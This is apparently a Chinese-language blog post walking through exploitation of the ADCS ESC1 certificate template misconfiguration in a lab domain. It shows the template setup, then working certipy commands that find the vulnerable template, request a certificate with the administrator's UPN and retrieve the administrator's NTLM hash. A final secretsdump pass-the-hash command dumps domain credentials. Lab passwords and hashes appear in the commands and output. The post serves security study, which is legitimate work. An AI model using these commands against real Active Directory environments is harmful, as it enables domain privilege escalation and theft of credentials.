错误的 ADCS 模板配置-ESC1

搭建环境

点击证书颁发机构

证书模版 - 复制工作站身份验证

使用者名称：在请求中提供

扩展：应用程序策略配置客户端身份验证

安全：增加 domain users 的注册权限

颁布新模版

漏洞探测

1	`certipy find -u [email protected] -p Cqk@123 -dc-ip 192.168.214.200 -vulnerable -debug`

1	`certipy find -u [email protected] -p Cqk@123 -dc-ip 192.168.214.200 -vulnerable -stdout -scheme ldap`

针对 ESC1 请求证书

1	`certipy req -u [email protected] -p 'Cqk@123' -target 192.168.214.200 -ca UST4-DC01-CA -template esc1 -upn [email protected] -debug`

利用证书申请 HASH

1	`certipy auth -pfx administrator.pfx -dc-ip 192.168.214.200`

1	`[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:214114172ade9bb8d8feca6d765e0cf9`

利用 HASH 进行横向

1	`python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:214114172ade9bb8d8feca6d765e0cf9 ust4.fun/[email protected]`

Web

#Web

错误的 ADCS 模板配置-ESC1

https://52hertz.tech/2024/01/10/ADCS-ESC1/

作者

Ustin1an

发布于

2024年1月10日

许可协议

主辅域控 Relay 上一篇

CVE-2022-26923 ADCS提权下一篇